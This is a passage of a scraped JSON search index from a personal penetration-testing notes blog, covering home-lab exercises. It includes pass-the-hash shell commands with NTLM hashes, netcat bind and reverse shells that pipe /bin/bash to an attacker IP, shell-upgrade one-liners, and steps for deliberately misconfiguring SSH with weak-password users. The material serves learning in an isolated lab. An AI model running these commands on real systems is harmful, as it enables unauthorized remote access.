id=\"dnsmap\"\u003eDNSMap\u003c/h2\u003e\n\u003cp\u003eDNSmap works a bit differently from the tools we looked at in the previous sections. DNSmap attempts to enumerate the subdomains of an organization\u0026rsquo;s domain name by querying a built-in wordlist on Kali Linux. Once a subdomain has been found, DNSmap will also attempt to resolve the IP address automatically.\n\u003cimg alt=\"enums_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/01/enums_1.png\"\u003e\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"sublist3r\"\u003esublist3r\u003c/h2\u003e\n\u003cp\u003eYou can leverage the power of search engines for discovering sub-domains by using the Sublist3r tool. Sublist3r is a Python-based tool that is used to enumerate (extract/obtain) the subdomains of a given website using OSINT, such as search engines and other internet indexing platforms.\u003c/p\u003e","title":"Enumerating Subdomains"},{"content":"pth-winexe: pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5 //192.168.83.136 cmd Impacket-psexec: impacket-psexec Administrator@192.168.83.136 -hashes aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5 xfreerdp: xfreerdp3 /u:Administrator /pth:8f5081696f366cdc72491a2c4996bd5 /v:192.168.83.136 This will give GUI access of the target.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/01-gaining-a-shell-with-pth-winexe-impacketxfreerdp/","summary":"\u003ch2 id=\"pth-winexe\"\u003epth-winexe:\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003epth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5 //192.168.83.136 cmd\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"gs_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/PE/01/gs_1.png\"\u003e\u003c/p\u003e\n\u003ch2 id=\"impacket-psexec\"\u003eImpacket-psexec:\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-psexec Administrator@192.168.83.136 -hashes aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"gs_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/PE/01/gs_2.png\"\u003e\u003c/p\u003e\n\u003ch2 id=\"xfreerdp\"\u003exfreerdp:\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003exfreerdp3 /u:Administrator /pth:8f5081696f366cdc72491a2c4996bd5 /v:192.168.83.136\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eThis will give GUI access of the target.\u003c/p\u003e","title":"Gaining a Shell Using pth-winexe, Impacket \u0026 xfreerdp"},{"content":" OpenSSH is the open-source version of the Secure Shell (SSH) tools used by administrators of Linux and other non-Windows for cross-platform management of remote systems. Beginning with Windows 10 build 1809 and Windows Server 2019, OpenSSH is available as a feature on demand. OpenSSH for Windows has the following commands built in: ssh is the SSH client component that runs on the user\u0026rsquo;s local system sshd is the SSH server component that must be running on the system being managed remotely ssh-keygen generates, manages and converts authentication keys for SSH ssh-agent stores private keys used for public key authentication ssh-add adds private keys to the list allowed by the server ssh-keyscan aids in collecting the public SSH host keys from hosts sftp is the service that provides the Secure File Transfer Protocol, and runs over SSH scp is a file copy utility that runs on SSH Prerequisites check: To validate your environment, open an elevated PowerShell session and do the following:\nEnter winver.exe and press enter to see the version details for your Windows device. Run $PSVersionTable.PSVersion. Verify your major version is at least 5, and your minor version at least 1. Learn more about installing PowerShell on Windows. To check when you\u0026rsquo;re an administrator, run the following command. The output shows True when you\u0026rsquo;re a member of the built-in Administrators group. (New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) Installing OpenSSH server: Open windows server 2019, Run powershell as administrator Checking availability of OpenSSH: Get-WindowsCapability -Online | Where-Object Name -like \u0026#39;OpenSSH*\u0026#39; 3. Installing Open ssh server:\nAdd-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 4. To start and configure OpenSSH Server for initial use, open an elevated PowerShell prompt (right-click, then select Run as an administrator), then run the following commands to start the sshd service:\n# Start the sshd service Start-Service sshd # OPTIONAL but recommended: Set-Service -Name sshd -StartupType \u0026#39;Automatic\u0026#39; # Confirm the Firewall rule is configured. It should be created automatically by setup. Run the following to verify if (!(Get-NetFirewallRule -Name \u0026#34;OpenSSH-Server-In-TCP\u0026#34; -ErrorAction SilentlyContinue)) { Write-Output \u0026#34;Firewall Rule \u0026#39;OpenSSH-Server-In-TCP\u0026#39; does not exist, creating it...\u0026#34; New-NetFirewallRule -Name \u0026#39;OpenSSH-Server-In-TCP\u0026#39; -DisplayName \u0026#39;OpenSSH Server (sshd)\u0026#39; -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22 } else { Write-Output \u0026#34;Firewall rule \u0026#39;OpenSSH-Server-In-TCP\u0026#39; has been created and exists.\u0026#34; } Openssh server misconfigs: We need to confirm that password authentication is enabled: notepad C:\\ProgramData\\ssh\\sshd_config Look for the line #PasswordAuthentication yes. Remove the # at the beginning to uncomment it. If the line says PasswordAuthentication no, change it to yes. Restart the sshd service Restart-Service sshd Creating a vulnerable user: In the same PowerShell or a Command Prompt (as Administrator), run the following command. We\u0026rsquo;ll create a user named victim with the password Password123. net user victim Password123 /add Add another user\nNew-LocalUser -Name \u0026#34;sysadmin\u0026#34; -Password (ConvertTo-SecureString \u0026#34;Password123\u0026#34; -AsPlainText -Force) Now let\u0026rsquo;s try to connect using our kali machine using the command: ssh USERNAME@WINDOWS_SERVER_IP OUR VULNERABLE SERVER IS SETUP TO PERFORM SOME ATTACKS, LET\u0026rsquo;S DO IT ON THE NEXT SECTION.\nChecking logs and setting up open shh log facility: By default the logs will be shown for ssh connections on the Event Viewer , let\u0026rsquo;s check them through some powershell commands: # To see the last 20 log entries: Get-WinEvent -LogName OpenSSH/Operational -MaxEvents 20 # To find only successful connections: Get-WinEvent -LogName OpenSSH/Operational | Where-Object { $_.Message -like \u0026#34;*Accepted password*\u0026#34; } # To find failed connections(brute-force scenario): Get-WinEvent -LogName OpenSSH/Operational | Where-Object { $_.Message -like \u0026#34;*Failed password*\u0026#34; } 2. Setting up sshd.log from sshd_config file: 3. Open the config file using notepad and uncomment these two options: 4. Then set the SyslogFacility AUTH to SyslogFacility LOCAL0 , LogLevel INFO is fine, or you can set LogLevel DEBUG 5. Restart sshd service\nRestart-Service sshd After doing that, logs would start appearing in C:\\ProgramData\\ssh\\logs\\sshd.log ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/01-misconfiguring-ssh-on-windows-server/","summary":"\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eOpenSSH\u003c/code\u003e is the open-source version of the Secure Shell (SSH) tools used by administrators of Linux and other non-Windows for cross-platform management of remote systems. Beginning with Windows 10 build 1809 and Windows Server 2019, OpenSSH is available as a feature on demand.\u003c/li\u003e\n\u003cli\u003eOpenSSH for Windows has the following commands built in:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003essh\u003c/code\u003e is the SSH client component that runs on the user\u0026rsquo;s local system\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003esshd\u003c/code\u003e is the SSH server component that must be running on the system being managed remotely\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003essh-keygen\u003c/code\u003e generates, manages and converts authentication keys for SSH\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003essh-agent\u003c/code\u003e stores private keys used for public key authentication\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003essh-add\u003c/code\u003e adds private keys to the list allowed by the server\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003essh-keyscan\u003c/code\u003e aids in collecting the public SSH host keys from hosts\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003esftp\u003c/code\u003e is the service that provides the Secure File Transfer Protocol, and runs over SSH\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003escp\u003c/code\u003e is a file copy utility that runs on SSH\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"prerequisites-check\"\u003ePrerequisites check:\u003c/h2\u003e\n\u003cp\u003eTo validate your environment, open an elevated PowerShell session and do the following:\u003c/p\u003e","title":"Misconfiguring SSH on Windows Server"},{"content":" Threat actors and Advanced Persistent Threat (APT) groups are always thinking about clever techniques and strategies to compromise their next target. A technique that is commonly used by threat actors is implementing C2 operations to centrally manage compromised hosts over the internet. A threat actor will set up one or more C2 servers on the internet that serve the purpose of centrally managing infected and compromised systems, uploading data from the compromised hosts, and downloading additional malware onto newly infected devices. Note These C2 servers also serve as update servers for malware such as ransomware. When ransomware infects a new device, most malware is designed to establish a connection to designated C2 servers on the internet to download updates, which ensures cybersecurity professionals are not able to eradicate/remove the malware infection from the host.\nOnce the C2 servers are deployed on the internet, the threat actor will attempt to infect the targeted systems, with a bot using various techniques, ranging from social engineering campaigns to infecting trusted web servers to host driveby-downloads of malicious payloads on visitors’ computers. Once a bot is installed on a host device, it will attempt to establish a connection to its designated C2 server to download updates and listen for incoming instructions. Note A bot, short for robot, is an application that’s created by a threat actor to perform automated tasks such as malicious activities like performing Distributed Denial-of-Service (DDoS) attacks, sending spam and phishing emails to targets, and even spreading malware. Bots are usually installed on compromised systems and retrieve instructions from a C2 server that is managed by a threat actor.\nAs more devices are infected over time with the bot, it becomes a botnet, an army of zombie machines that can be controlled by the threat actor. Setting up c2 operations: One of the coolest features of Empire 5 is the ability to deploy it using a client-server model. This allows you to set up a centralized C2 server anywhere, such as on the cloud or even on-premises on an organization’s network. You can create multiple user accounts on the Empire server to allow access to additional penetration testers who are working on the same penetration test engagement as you. They can use the Empire client to individually log in to the same Empire server and work together. Empire client server model: Before getting started, keep in mind that you will need two Kali Linux virtual machines. One machine will be hosting the Empire server while another will be used as the Empire client. For this exercise, we will be using two separate Kali Linux machines to demonstrate how to deploy Empire using the client-server model. CLONING THE KALI machine:\nOpen vmware -\u0026gt; power off the kali vm , right click on it -\u0026gt; maange -\u0026gt; clone -\u0026gt; full clone -\u0026gt; select the disk where you want to store the machine. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/09-command-and-control-tactics/01-usecases-of-c2/","summary":"\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eThreat actors and Advanced Persistent Threat (APT)\u003c/code\u003e groups are always thinking about clever techniques and strategies to compromise their next target. A technique that is commonly used by threat actors is implementing C2 operations to centrally manage compromised hosts over the internet. A threat actor will set up one or more C2 servers on the internet that serve the purpose of centrally managing infected and compromised systems, uploading data from the compromised hosts, and downloading additional malware onto newly infected devices.\u003c/li\u003e\n\u003c/ul\u003e\n\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition note\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 576 512\"\u003e\u003cpath d=\"M0 64C0 28.7 28.7 0 64 0L224 0l0 128c0 17.7 14.3 32 32 32l128 0 0 125.7-86.8 86.8c-10.3 10.3-17.5 23.1-21 37.2l-18.7 74.9c-2.3 9.2-1.8 18.8 1.3 27.5L64 512c-35.3 0-64-28.7-64-64L0 64zm384 64l-128 0L256 0 384 128zM549.8 235.7l14.4 14.4c15.6 15.6 15.6 40.9 0 56.6l-29.4 29.4-71-71 29.4-29.4c15.6-15.6 40.9-15.6 56.6 0zM311.9 417L441.1 287.8l71 71L382.9 487.9c-4.1 4.1-9.2 7-14.9 8.4l-60.1 15c-5.5 1.4-11.2-.2-15.2-4.2s-5.6-9.7-4.2-15.2l15-60.1c1.4-5.6 4.3-10.8 8.4-14.9z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eNote\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eThese C2 servers also serve as update servers for malware such as ransomware. When ransomware infects a new device, most malware is designed to establish a connection to designated C2 servers on the internet to download updates, which ensures cybersecurity professionals are not able to eradicate/remove the malware infection from the host.\u003c/p\u003e","title":"Use Cases of Command and Control"},{"content":"The Nmap Scripting Engine (NSE) is one of the most powerful features within Nmap. It allows penetration testers and security researchers to create, automate, and perform customized scanning on a target system or network. When using NSE, the scanning techniques are usually aggressive and can sometimes create data loss or even crash a target system.\nNSE script types: Auth: This category contains scripts that can scan a target to detect whether authentication bypass is possible. Broadcast: This category contains scripts that are used to discover host systems on a network. Brute: This category contains scripts that are used to perform some types of bruteforce attacks on a remote server to gain unauthorized access. Default: This category contains a set of default scripts within NSE for scanning. Discovery: This category contains scripts that are used in active information gathering regarding network services on a target. \u0026quot;DoS\u0026quot;: This category contains scripts that can simulate a Denial-of-Service (DoS) attack on a target to check whether the target is susceptible to such types of attacks. Exploit: This category contains scripts that are used to actively exploit security vulnerabilities on a target. External: This category contains scripts that usually send data that\u0026rsquo;s been gathered from a target to an external resource for further processing. Fuzzer: This category contains scripts that are used to send random data into an application to discover any software bugs and vulnerabilities within applications. Intrusive: This category contains high-risk scripts that can crash systems and cause data loss. Malware: This category contains scripts that can determine whether a target is infected with malware. Safe: This category contains scripts that are not intrusive and safe to use on a target system. Version: This category contains scripts that are used to gather the version information of services on a target system. Vuln: This category contains scripts that are used to check for specific vulnerabilities on a target system. Performing scan using NSE: nmap --script ftp-vsftpd-backdoor 172.30.1.134 -p 21 The --script command allows you to specify either a single script, multiple scripts, or a category of scripts. We also saw that the target machine is exploitable: 2. I searched up for the version name and it\u0026rsquo;s exploit , we got one: 3. Additionally, within Kali Linux, there is a tool known as searchsploit that allows you to perform a query/search for exploits within the offline version of Exploit-DB on Kali Linux 4. Open msfconsole , search for vsftpd 2.3.4 5. use that exploit using the command use 0 , then show info 6. If you want to execute an entire category of scripts in NSE, you can use the \u0026ndash;script \u0026lt;category-name\u0026gt;\nnmap --script vuln 172.30.1.134 A bunch of information will be spit out by NMAP ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/05-vulnerability-assessment/01-vulnerability-discovery-using-nmap/","summary":"\u003cp\u003eThe \u003ccode\u003eNmap Scripting Engine (NSE)\u003c/code\u003e is one of the most powerful features within Nmap. It allows penetration testers and security researchers to create, automate, and perform customized scanning on a target system or network. When using NSE, the scanning techniques are usually aggressive and can sometimes create data loss or even crash a target system.\u003c/p\u003e\n\u003ch2 id=\"nse-script-types\"\u003eNSE script types:\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAuth\u003c/code\u003e: This category contains scripts that can scan a target to detect whether authentication bypass is possible.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eBroadcast\u003c/code\u003e: This category contains scripts that are used to discover host systems on a network.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eBrute\u003c/code\u003e: This category contains scripts that are used to perform some types of bruteforce attacks on a remote server to gain unauthorized access.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDefault\u003c/code\u003e: This category contains a set of default scripts within NSE for scanning.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDiscovery\u003c/code\u003e: This category contains scripts that are used in active information gathering regarding network services on a target.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e\u0026quot;DoS\u0026quot;\u003c/code\u003e: This category contains scripts that can simulate a Denial-of-Service (DoS) attack on a target to check whether the target is susceptible to such types of attacks.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eExploit\u003c/code\u003e: This category contains scripts that are used to actively exploit security vulnerabilities on a target.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eExternal\u003c/code\u003e: This category contains scripts that usually send data that\u0026rsquo;s been gathered from a target to an external resource for further processing.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFuzzer\u003c/code\u003e: This category contains scripts that are used to send random data into an application to discover any software bugs and vulnerabilities within applications.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eIntrusive\u003c/code\u003e: This category contains high-risk scripts that can crash systems and cause data loss.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eMalware\u003c/code\u003e: This category contains scripts that can determine whether a target is infected with malware.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSafe\u003c/code\u003e: This category contains scripts that are not intrusive and safe to use on a target system.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eVersion\u003c/code\u003e: This category contains scripts that are used to gather the version information of services on a target system.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eVuln\u003c/code\u003e: This category contains scripts that are used to check for specific vulnerabilities on a target system.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch3 id=\"performing-scan-using-nse\"\u003ePerforming scan using NSE:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap --script ftp-vsftpd-backdoor 172.30.1.134 -p \u003cspan class=\"m\"\u003e21\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"nse_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/01/nse_1.png\"\u003e\nThe \u003ccode\u003e--script\u003c/code\u003e command allows you to specify either a single script, multiple scripts, or a category of scripts. We also saw that the target machine is exploitable:\n\u003cimg alt=\"nse_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/01/nse_2.png\"\u003e\n2. I searched up for the version name and it\u0026rsquo;s exploit , we got one:\n\u003cimg alt=\"nse_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/01/nse_3.png\"\u003e\n3. Additionally, within Kali Linux, there is a tool known as \u003ccode\u003esearchsploit\u003c/code\u003e that allows you to perform a query/search for exploits within the offline version of Exploit-DB on Kali Linux\n\u003cimg alt=\"nse_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/01/nse_4.png\"\u003e\n4. Open \u003ccode\u003emsfconsole\u003c/code\u003e , search for \u003ccode\u003evsftpd 2.3.4\u003c/code\u003e\n\u003cimg alt=\"nse_5\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/01/nse_5.png\"\u003e\n5. use that exploit using the command \u003ccode\u003euse 0\u003c/code\u003e , then \u003ccode\u003eshow info\u003c/code\u003e\n\u003cimg alt=\"nse_6\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/01/nse_6.png\"\u003e\n6. If you want to execute an entire category of scripts in NSE, you can use the \u0026ndash;script \u003ccode\u003e\u0026lt;category-name\u0026gt;\u003c/code\u003e\u003c/p\u003e","title":"Vulnerability Discovery Using Nmap"},{"content":"Bind shells are commonly used by penetration testers to logically set up a service port in a listening state on a targeted system while binding the listening service port to a native shell such as Bourne Again Shell (Bash) on Linux or Command Prompt on Windows; this is commonly referred to as a listener. Once the penetration tester initiates a connection to the listener and a session is established, the penetration tester will gain access to the targeted system’s native shell, whether it’s Bash on Linux or Command Prompt on a Windows-based system.\nThe following are common attributes of a bind shell for penetration testers: • Bind shells are shells that are bound to a specific port to create a listener for incoming connections from a remote machine. • When a remote machine establishes a connection to the targeted system that is running the listener on the specific bind port, a shell is spawned between the remote machine and the targeted system, therefore, providing remote access to the targeted system. • Bind shells are commonly used by penetration testers when the IP address of the targeted system is known and a listener can be configured on it.\nImportant On a NAT-enabled router, the private source IPv4 address is translated into the public IPv4 address on the internet-facing interface on the router before it’s sent on the internet. This means that internet-connected devices will see the sender’s address as the public IPv4 address on the router or modem and not the private IPv4 address of the client on the private network. NAT prevents direct connections between source and destination devices. To learn more about NAT, please visit https://www.comptia.org/content/guides/what-is-network-address-translation.\nThe penetration tester can use Netcat, Ncat, and even Metasploit to set up bind shells between target and attacker machines. These common cybersecurity tools are very useful for binding an IP address and port number for listeners. Keep in mind that once a shell is established between systems, the penetration tester will be able to remotely execute commands on the targeted system over a network.\nThe following are common attributes of a reverse shell for penetration testers: • Penetration testers set up a listener on the attacker machine and send instructions to the targeted system to establish a call-back session. • When the targeted system establishes a session to the listener on the attacker machine, a shell is spawned, which enables the penetration tester to remotely execute commands on the target. • Reverse shells are commonly used when the penetration tester does not have direct access to the targeted machine that is behind a NAT-enable router or firewall. Therefore, it is less complex for the compromised system to establish an outbound connection to the internet.\nSetting up netcat: We are going to connect with the target machine it could be either linux/windows machine:\nPower on the Kali Linux virtual machine, open the Terminal, and use the following commands to create a Netcat listener that binds the native bash shell to the listener nc -nvlp 1234 The following is a breakdown of the preceding commands: • -n: This specifies to use the IP address only and not perform Domain Name System (DNS) queries • -l: This specifies to listening for incoming connections • -v: This specifies using the verbose mode • -p: This specifies the listening port number\nThen power on the virtual machine of windows device, in my case i will be turning on UBUNTU-SERVER from PENTEST-NET network. We need to transfer the netcat executable to the ubuntu machine. You can use any linux/windows machine to perform this task. Make sure for windwos machine you have transferred the nc.exe using the upcoming steps , and for linux you may have already installed nc by default.\nLet\u0026rsquo;s setup a python web server for transferring files: # on kali cd /usr/share/windows-binaries python3 -m http.server 8080 if 8080 is already in use , try another port like 8000 Got it.\nNow open up the ubuntu\u0026rsquo;s browser, head over to your kali\u0026rsquo;s IP along with the port like this: kali_ip:8000 Now let\u0026rsquo;s connect from the ubuntu machine to the kali: nc -nv kali_ip 1234 You will be connected and able to send messages.\nAfter the connection we can share messages like this: To terminate the session, use the Ctrl + Z key combination on the keyboard. Note If you want to use metasploitable 2 linux for performing this practical, i don\u0026rsquo;t know if it comes woth wget or not by default. If so then you can use wget kali_ip:port_number nc.exe to get the file from the web server and perform the nc shell practical\nSetting up a bind shell: Power on the Kali Linux virtual machine, open the Terminal, and use the following commands to create a Netcat listener that binds the native bash shell to the listener: nc -nvlp 1234 -e /bin/bash Tip If setting up the listener on a Microsoft Windows system, the nc -nlvp 1234 -e cmd.exe command will enable you to bind the Windows Command Prompt to the listener using Netcat.\nNow establish the connection from ubuntu machine: nc -nv 192.168.83.128 1234 Tip To get a Linux Terminal interface when using a bind shell, use the python -c 'import pty; pty.spawn(\u0026quot;/bin/bash\u0026quot;)' command.\nSetting up a reverse shell: In this scenario the UBUNTU-SERVER will initiate a connection to our listener. Setting up the listener on kali linux : nc -nvlp 1234 Initiating the connection from UBUNTU-SERVER : Before that install the netcat-traditional on ubuntu by using the command: sudo apt install netcat-traditional Then set it default by using the command sudo update-alternatives --config nc and choosing the option /bin/nc.traditional Then run the following command: nc -nv 192.168.83.128 1234 -e /bin/bash Till now we are done. Let\u0026rsquo;s checkout the results and shell upgradation techniques: shell upgradation: I tried to look for python but it wasn\u0026rsquo;t installed, then i looked for perl , it was installed but not working idk why. Then i found a command by googling which is script /dev/null -c bash which gave me an interactive shell: Perl and python shell upgradation commands:\npython -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; perl -e \u0026#39;exec \u0026#34;/bin/sh\u0026#34;;\u0026#39; perl -e \u0026#39;exec \u0026#34;/bin/bash\u0026#34;;\u0026#39; Having completed this section, you have learned how to create a reverse shell using Netcat. However, keep in mind that Netcat does not encrypt messages between the Netcat client and server, which can lead to detection. However, it’s worth noting that both Ncat and Socat can be used to provide data encryption between host systems when working with remote shells.\nImportant To learn more about Ncat, please visit https://nmap.org/ncat/guide/index.html. To learn more about Socat, please visit https://www.redhat.com/sysadmin/gettingstarted-socat.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/06-understading-network-pentesing/01-working-with-bind-and-reverse-shells/","summary":"\u003cp\u003e\u003ccode\u003eBind shells\u003c/code\u003e are commonly used by penetration testers to logically set up a service port in a listening state on a targeted system while binding the listening service port to a native shell such as \u003ccode\u003eBourne Again Shell (Bash)\u003c/code\u003e on Linux or \u003ccode\u003eCommand Prompt\u003c/code\u003e on Windows; this is commonly referred to as a listener. Once the penetration tester initiates a connection to the listener and a session is established, the penetration tester will gain access to the targeted system’s native shell, whether it’s Bash on Linux or Command Prompt on a Windows-based system.\u003c/p\u003e","title":"Working With Bind and Reverse Shells"},{"content":" Note Tcpdump is a network sniffing tool. Same as Wireshark but tcpdump is CLI based.\nPractical usecase: Listing all the network interfaces in our machine: tcpdump -D 2. Sniffing traffic from our interface:\nsudo tcpdump -i ens33{mention_your_own_interface_name} ICMP traffic(ping): To get the desired output as shown use your kali machine to ping the machine which is running tcpdump\nformat of the traffic: {timeframe{hh:mm:ss}:microsecond} {source_ip} \u0026gt; {Destination_ip} {request/reply}, {id}, {sequence number} {data length}\nnmap SYN scan traffic:\nTo get the desired output as shown use your kali machine to run nmap to the machine which is running tcpdump. Used nmap command for this practical - {nmap -sS target_ip_running_tcpdump}\nTraffic format: {timeframe{hh:mm:ss}:microsecond} {source_ip:source port} \u0026gt; {Destination_ip:destination_port} {Flags {SYN/S}} {packet sequence number} {window size} {maximum segment size/mss} {data length}\nOther useful commands of tcpdump: tcpdump -c N # capturing N number of packets where N \u0026gt; 0 tcpdump -w captured_packet.pcap # capture the packets and write into a file tcpdump -r captured_packet.pcap # reading from a pre-saved pcap file tcpdump -ttt # capture packets with proper readable timestamp tcpdump -i eth0 port 22 # capturing incoming traffic specific to ssh/port 22 tcpdump -i eth0 src 192.168.83.128 # capturing traffic those are having source ip as 192.168.83.128 tcpdump -i eth0 dst 192.168.83.145 # capturing traffic that are having destination ip as 192.168.83.145 ","permalink":"https://0x-s0M3n4th.github.io/notes/miscellaneous/int-250/tcpdump/","summary":"\u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition note\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 576 512\"\u003e\u003cpath d=\"M0 64C0 28.7 28.7 0 64 0L224 0l0 128c0 17.7 14.3 32 32 32l128 0 0 125.7-86.8 86.8c-10.3 10.3-17.5 23.1-21 37.2l-18.7 74.9c-2.3 9.2-1.8 18.8 1.3 27.5L64 512c-35.3 0-64-28.7-64-64L0 64zm384 64l-128 0L256 0 384 128zM549.8 235.7l14.4 14.4c15.6 15.6 15.6 40.9 0 56.6l-29.4 29.4-71-71 29.4-29.4c15.6-15.6 40.9-15.6 56.6 0zM311.9 417L441.1 287.8l71 71L382.9 487.9c-4.1 4.1-9.2 7-14.9 8.4l-60.1 15c-5.5 1.4-11.2-.2-15.2-4.2s-5.6-9.7-4.2-15.2l15-60.1c1.4-5.6 4.3-10.8 8.4-14.9z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eNote\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eTcpdump is a network sniffing tool. Same as Wireshark but tcpdump is CLI based.\u003c/p\u003e","title":"Practical Demo: tcpdump"},{"content":"This is going to be a very raw blog, mostly about what I am going to post in the next few months, and what I have been doing for the past few weeks.\nSo, let\u0026rsquo;s start with what I was doing\u0026hellip;\nAfter completing eJPT certification and learning the basics as well as core concepts of system administration, I got my hands dirty on CTF platforms like HTB. I took a one-month subscription just to get the experience of it. But not gonna lie, it was not what I expected. First of all, playing CTFs on these platforms are very good for many people, and the platforms do a great job. But I didn\u0026rsquo;t like the CTFish or more like obviously vulnerable experience. I thought the normal HTB boxes would replicate real-world scenarios—hardened systems where normal scans easily fail, and where initial access depends on phishing, social engineering, or hardcore OSINT rather than an obvious open port. That wasn\u0026rsquo;t what I found. But definately HTB is a great platform for sharpening your skills under time pressure.\nLater I realized that I could get this experience through HTB pro boxes(not sure though), but I don\u0026rsquo;t have the money for it. So I decided to make my own home lab. I took the PNPT course offered by TCM Security. It was hands-on, very good for beginners who want to learn how actual real-world pentest workflows work. After that, I expanded my lab. Let me give you an overview of what my lab includes:\nATTACK-NET : kali linux PENTEST-NET : metasploitable2 linux, kioptrix, DEV, Black Pearl, UBUNTU-SERVER EXTERNAL-RED : Win server 2019(fully custom, I do the administrative configs on it) PIVOT-NET : THEPUNISHER(win 10 enterprise), THESUPERMAN(win 10 enterprise) SECURE-NET : Windows server 2022 This is my home lab. I do all of my experiments in this whole lab. I have made 3 custom networks to simulate a real-world scenario in vmware. My PIVOT-NET and SECURE-NET machines are totally isolated from the internet. Later I will share the entire lab setup I created for my home lab through a 